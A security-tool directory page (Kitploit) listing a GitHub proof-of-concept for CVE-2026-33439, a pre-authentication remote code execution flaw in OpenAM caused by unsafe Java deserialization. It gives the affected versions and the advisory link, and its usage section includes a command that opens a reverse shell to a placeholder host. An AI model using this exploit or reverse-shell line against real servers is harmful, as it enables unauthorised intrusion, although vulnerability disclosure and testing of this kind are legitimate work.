Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/rh33t/cve-2026-33439-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

PoC for CVE-2026-33439, a pre-auth RCE in OpenAM via unsafe Java deserialization.

View Repository
15h 17m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-33439

Pre-auth RCE in OpenIdentityPlatform OpenAM via unsafe Java deserialization of the jato.clientSession parameter. Affected <= 16.0.5, fixed in 16.0.6.

Advisory: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

Usage

root@kitploit:~
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

Output is blind. The request blocks until the command exits, so timing confirms execution (--command 'sleep 5' takes about 5s).

For authorized security testing only.

Download Tool